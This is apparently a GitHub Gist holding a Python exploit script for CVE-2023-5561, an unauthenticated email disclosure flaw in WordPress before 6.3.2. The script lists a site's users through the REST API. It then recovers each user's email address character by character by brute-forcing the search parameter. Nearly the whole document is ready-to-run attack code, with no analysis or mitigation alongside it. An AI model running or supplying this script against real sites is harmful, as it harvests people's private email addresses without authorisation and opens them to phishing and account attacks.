Last active
November 2, 2023 19:31
-
-
Save numanturle/07c0419660bcbb56d81708ecf033dcd8 to your computer and use it in GitHub Desktop.
CVE-2023-5561
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import string | |
import warnings | |
import json | |
import argparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
warnings.simplefilter('ignore',InsecureRequestWarning) | |
proxy = { | |
"http":"127.0.0.1:8080", | |
"https":"127.0.0.1:8080" | |
} | |
def init(): | |
parser = argparse.ArgumentParser(description='WP < 6.3.2 – Unauthenticated Post Author Email Disclosure CVE-2023-5561') | |
parser.add_argument('-u','--host',help='Host', type=str, required=True) | |
args = parser.parse_args() | |
exploit(args) | |
def exploit(args): | |
host = args.host | |
users = extract_users(host) | |
print("[+] Total users: " + str(len(users))) | |
if len(users) > 0: | |
print("[+] Extracting emails...") | |
for user in users: | |
email = extract_email(host, user) | |
print("[+] " + user + ": " + email) | |
else: | |
print("[-] No users found or rest api not enabled") | |
def extract_users(host): | |
wp_users = [] | |
url = host + "/wp-json/wp/v2/users" | |
r = requests.get(url, verify=False, proxies=proxy) | |
text_without_bom = r.text.encode().decode('utf-8-sig') | |
result_json = json.loads(text_without_bom) | |
for user in result_json: | |
wp_users.append(user['slug']) | |
return wp_users | |
def extract_email(host, user): | |
print("[+] User: " + user) | |
print("[+] Stage 1 - Extracting email suffix...") | |
url = host + "/wp-json/wp/v2/users?search=" | |
stage1 = "@" | |
restart = True | |
while restart: | |
restart = False | |
for i in string.ascii_lowercase + string.digits + "._-": | |
payload = stage1 + i | |
r = requests.get(url + payload, verify=False, proxies=proxy) | |
text_without_bom = r.text.encode().decode('utf-8-sig') | |
if text_without_bom != "[]": | |
if user in text_without_bom: | |
restart = True | |
stage1 = payload | |
break | |
print("[+] User found: " + user + " - " + stage1 + " - Extracting email...") | |
print("[+] Stage 2 - Extracting email prefix...") | |
restart = True | |
stage2 = stage1 | |
while restart: | |
restart = False | |
for i in string.ascii_lowercase + string.digits + "._-": | |
payload = i + stage2 | |
r = requests.get(url + payload, verify=False, proxies=proxy) | |
text_without_bom = r.text.encode().decode('utf-8-sig') | |
if text_without_bom != "[]": | |
if user in text_without_bom: | |
restart = True | |
stage2 = payload | |
break | |
return stage2 | |
if __name__ == "__main__": | |
init() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment